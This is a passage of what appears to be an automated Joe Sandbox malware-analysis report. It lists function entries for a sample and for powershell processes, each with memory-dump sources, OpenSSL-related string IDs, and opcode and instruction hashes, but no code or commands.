                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007A5461170
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\x509v3\v3_utl.c$E
                                                                                                                                                                                                                                    • API String ID: 1676360054-2813183830
                                                                                                                                                                                                                                    • Opcode ID: 197d39180300df43221f1d0444a5c92c0b6f77bad688943df23ec613df87b6c6
                                                                                                                                                                                                                                    • Instruction ID: 209d671a1911b255e868de8511b430b9a10c3238c178a8f69d91a48e1e4c45f9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 197d39180300df43221f1d0444a5c92c0b6f77bad688943df23ec613df87b6c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56415E62B1EB4245EA38EFD2A43037A63A8AF45780F445635EE4D27B95DF3DE511C700
                                                                                                                                                                                                                                    Function 00007FFD93D139B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                                                                                                                                                                                                    • API String ID: 3568877910-2201148535
                                                                                                                                                                                                                                    • Opcode ID: ffb6a3000f1f43db175e07ee08783f9f81d8d84b3e7221bb60cce5b0c7cc5f2d
                                                                                                                                                                                                                                    • Instruction ID: d24bb35021836859f81118b30781d401ea72219d3c5315537e1c55559a6a7956
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffb6a3000f1f43db175e07ee08783f9f81d8d84b3e7221bb60cce5b0c7cc5f2d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9031DC61B0878682EA34EBD5E8742B96369FF86B84F404235EA1D27795EF3DE505C700
                                                                                                                                                                                                                                    Function 00007FF7B2B7F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                    • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                    • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                    • Instruction ID: 5dc69d1594f78e5476cd8a2e3690d6d0e25bc9fca476ecdc8cf057dd842afb2e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21212562A0928181EB22BB1CD04426FB3B1FBA5B44FC54039DB4D432ACEFBCD944C760
                                                                                                                                                                                                                                    Function 00007FFD93D13387 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastgetsockname
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                                                                                    • API String ID: 566540725-540685895
                                                                                                                                                                                                                                    • Opcode ID: 3f7e4d637075843b50ffdfd6546d49ef448eefcf8eb4d6d42073b27a69ad320d
                                                                                                                                                                                                                                    • Instruction ID: 4988b494b319f47f2252e74d50d7407b83cbebaee0bda144bab7e58e644ccc59
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f7e4d637075843b50ffdfd6546d49ef448eefcf8eb4d6d42073b27a69ad320d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF218CB1B0810686EB209BE2D8206AE7368EF81304F805231E65C07A95DF3DE699DB40
                                                                                                                                                                                                                                    Function 00007FF7B2B6FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                    • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                    • Instruction ID: ff432e68e2524181438430a90ae6f6fad9f07540786ada7cf2f339e97a492e80
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58114C32609B8182EB229F29E40025AB7E4FB99B88F584234DB8D47768EF7CD551CB00
                                                                                                                                                                                                                                    Function 00007FF7B2B8073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                    • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                    • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                    • Instruction ID: e24e7482a3a2e25d9e60ee98e9af8bb884b4093bc9117a16fcb0c71b8b16062f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601882591D20285FB26BF68946627FA3A0EF66784FC00439D74D4A699FFACD504CB24
                                                                                                                                                                                                                                    Function 00007FFD93D115AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007B22408
                                                                                                                                                                                                                                    • String ID: !$..\s\crypto\ct\ct_policy.c
                                                                                                                                                                                                                                    • API String ID: 4199793457-3401457818
                                                                                                                                                                                                                                    • Opcode ID: f8ad8f7d64f1f5fb2bc396660ebdd1b69d3ea8b5320bd96bda6debcd379a685e
                                                                                                                                                                                                                                    • Instruction ID: 45578cf42c5cb22f2b082f5a2b356bf48a83a5f404f1064d1e096d0ecddb55bb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8ad8f7d64f1f5fb2bc396660ebdd1b69d3ea8b5320bd96bda6debcd379a685e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43F0CD71F0620682EB249BE5D8213AD23A8FF41304F801134DA0D133C2EE3CEA56DB00
                                                                                                                                                                                                                                    Function 00007FFD93D16BEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                                                                                    • API String ID: 1021210092-540685895
                                                                                                                                                                                                                                    • Opcode ID: 4461a209f28e95a1d17e1fe27fd0101058cda89b9424f7b2e88bf19f5e6d7981
                                                                                                                                                                                                                                    • Instruction ID: 4a70a8e634675b7e8369a58e71a7ccd7a27a5606c6902144d2f17358d12fa84b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4461a209f28e95a1d17e1fe27fd0101058cda89b9424f7b2e88bf19f5e6d7981
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6E06560B0860386F7315BE29874B7A2328EF05309F008230E91D97A92DE3DA2588A01

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00007FFD330549DD Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000051.00000002.2341184128.00007FFD33050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33050000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_81_2_7ffd33050000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: H+3
                                                                                                                                                                                                                                    • API String ID: 0-3111835228
                                                                                                                                                                                                                                    • Opcode ID: b3776ad9546e42d6682f895b92c1608c8b2516e8ad14e9e7be5d99f81586bfa9
                                                                                                                                                                                                                                    • Instruction ID: 70606214d682e6c2b416e0639af94858152b0d5bdcbcd11b9d5ebac8c0e011f6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3776ad9546e42d6682f895b92c1608c8b2516e8ad14e9e7be5d99f81586bfa9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11618F70E0DA488FEB55DF6CD8956ECBBF1EF59310F1441AED04DE7292CA25A842DB40
                                                                                                                                                                                                                                    Function 00007FFD33121723 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000051.00000002.2341691656.00007FFD33120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33120000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_81_2_7ffd33120000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 37b2309d708ac3405a048964d6f4ca91d9befd629637a2c221f39b6993030c0f
                                                                                                                                                                                                                                    • Instruction ID: cd0b6988f0132fa7f6e485c925adf4e83aea32946f1c48b20ee12db5c6816c70
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37b2309d708ac3405a048964d6f4ca91d9befd629637a2c221f39b6993030c0f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3241F723B0CE4A0FF7D9DA5C55612B973D2EFC5261B58017ED64EC3197EE18E8029281
                                                                                                                                                                                                                                    Function 00007FFD331219AE Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000051.00000002.2341691656.00007FFD33120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33120000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_81_2_7ffd33120000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 622c90443fc6ccf9d871481b90bf32ddd158c446f92326c6a2236ba1fb697dc7
                                                                                                                                                                                                                                    • Instruction ID: 436affda4fc59a5bb116bcfe421b96cf37b52e695c3c7390f9cc5032e8b58e7b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 622c90443fc6ccf9d871481b90bf32ddd158c446f92326c6a2236ba1fb697dc7
